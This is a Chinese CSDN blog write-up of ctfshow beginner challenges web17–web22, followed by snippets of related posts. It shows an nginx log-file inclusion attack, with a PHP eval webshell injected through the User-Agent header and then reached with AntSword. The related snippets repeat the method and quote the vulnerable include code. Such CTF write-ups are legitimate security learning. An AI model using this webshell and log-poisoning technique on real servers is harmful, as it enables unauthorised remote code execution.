wp ctfshow 萌新 web17--web22

已于 2024-04-05 18:28:55 修改
阅读量262 收藏 2
点赞数 2
文章标签: web安全
于 2024-03-29 09:35:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/137131055
版权

美好的一天从做题开始

web17

c传参过滤掉php
思路:include文件包含,利用日志文件包含

访问日志文件:

?c=/var/log/nginx/access.log

(这一段是借鉴某个博主的因为我不是很懂怎么来的这个思路,但是有了这个思路就很简单的了)

user-agent传一句话木马

<?php eval($_POST['a']);?>

然后用antsword来连接

到手,第一次做文件包含的题真的还暂时不是很明白

web18,把file绕过了,难不成web17有直接构造payload的做法,我等会试试,我还是用的老办法直接看日志文件

?c=/var/log/nginx/access.log

传马上面的一模一样的,然后antsword链接,36d里面的flag(传马还是用的heckbar本人不爱用bp因为切屏麻烦等我后面买了显示屏再说咯)

web19       web20      web21         

一样的做法

web22

我还没买vps的,先放着吧

剩下的明天做今天准备看一点cr入门

问了我的好学长为什么日志包含,因为有“include”,然后没有禁用文件所以日志包含

baozongwi
关注
CTFshow web17
zoixsoadji的博客
03-12 8276
萌新计划 进入题目,是一行php代码,发现c传参过滤掉了php,尝试一下日志文件包含漏洞 nginx的日志文件位置是/var/log/nginx/access.log 发现日志文件记录了User-Agent 那么我们就在User-Agent中写入一句话木马 上传成功,接下来我们就用蚁剑来连接这个一句话木马 连接成功, 在36d.php下面就能看到flag ...
ctfshow萌新web17
qq_45829213的博客
02-20 2419
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/php/i",$c)){ include($c); } }else{ highlight_file(__FILE__); } ?> c传参过滤掉php 思路:include文件包含,利用日志文件包含 访问日志文件: ?c=/var/log/nginx/access.log 发现日志文件记
CTFSHOW 萌新 web17 解题思路和方法(利用文件包含漏洞)
最新发布
weixin_58052886的博客
08-27 426
点击题目,发现代码中使用了文件包含,那么我们可以尝试使用文件包含的方向解决该题,使用wapparryzer插件分析看到其服务器类型为nginx。发现其日志文件中写入了user-agent了信息,那么我们在提交请求的时候可以在user--agent中写入木马。使用bp抓包软件抓取请求,然后修改user-agent的值,写入一句话木马,然后提交请求。Web18、web19、web20、web21 解题思路和方法与web17一模一样。右键单击,进入目录,发现www下有两个文件,我们点击36d.php查看其内容。
ctfshow萌新计划web22
qq_46041723的博客
12-10 3255
ctfshow萌新计划web22前言正文web22 前言 上次做题,直接瞄准ctfshow萌新计划开炮,结果没打完,这次来补充一下。 正文 web22 打开题目,发现了源码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\:|\/|\\\/i",$c)){ include($c.".php"); } }else{ highlight_f
CTFshow中的web17
zhong_yan的博客
10-26 3393
打开题目,我们看到这样的提示 对于这里的探针我们可以使用tz.php尝试访问 可以看到,访问成功了。 然后这里的flag要一个一个找(emm,做个弊,直接在php信息里面找里面找(滑稽))。 然后找到里面的环境变量(environment) 可以看到里面是有flag的。(虽然也有一些刻意,但也不妨碍成为一种思路。) ...
CTF-show WEB入门--web17
m0_73912575的博客
02-06 549
CTF-show WEB入门--web12
CTFshow(web入门)(17~)
chenjyboke的博客
02-19 3357
web17 问题: 备份的sql文件会泄露敏感信息 解决:直接查询 backup.sql打开文件得到flag web18 问题: 不要着急,休息,休息一会儿,玩101分给你flag 解决: 查看源码发现js文件。发现unicode编码解码中文发现访问查看110.php找到flag web19 问题 密钥什么的,就不要放在前端了 解决:查看源码发现账号密码,由于加密使用post传参等得到flag web20 问题: mdb文件是早期asp+acces..
CTFSHOW系列-web17(信息收集-sql文件泄露)
siu~
12-01 580
CTFSHOW系列解题思路
ctfshow_web1-17_信息搜集
记录学习成长之路上的点点滴滴
03-23 500
2023/03/23 ctfshow刷题 web-入门 信息搜集 1-20
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1156
ctfshow-web入门-爆破wp
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-WEB-萌新赛-wp
F1rstb100d
09-03 671
ctfshow-WEB-萌新赛-wp
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 987
F12。
ctfshow-_萌新-wp
F1rstb100d
09-13 363
ctfshow-_萌新-wp
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 482
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
CTFSHOW萌新计划 web16-17
羽的博客
04-03 3101
题目地址 https://ctf.show 0x01 web16 这个直接爆破就可以了,但是如果你是官网群里的成员,就会知道有个36d的梗 payload=36d 爆破的话给个脚本 import hashlib str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' payload='' for i in str1...
CTFSHOW web入门——web171
m0_74093152的博客
03-26 457
查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+然后查询库名 1' union select 1,2,database() --+首先查询有多少列,1' order by 3--+查看ctfshow_web库的表。
ctfshow 萌新22 (类似级客巅峰web4)
Firebasky的博客
10-07 3510
在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。 使用阿呆~~~? 下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助 一. 源代码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_mat.
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值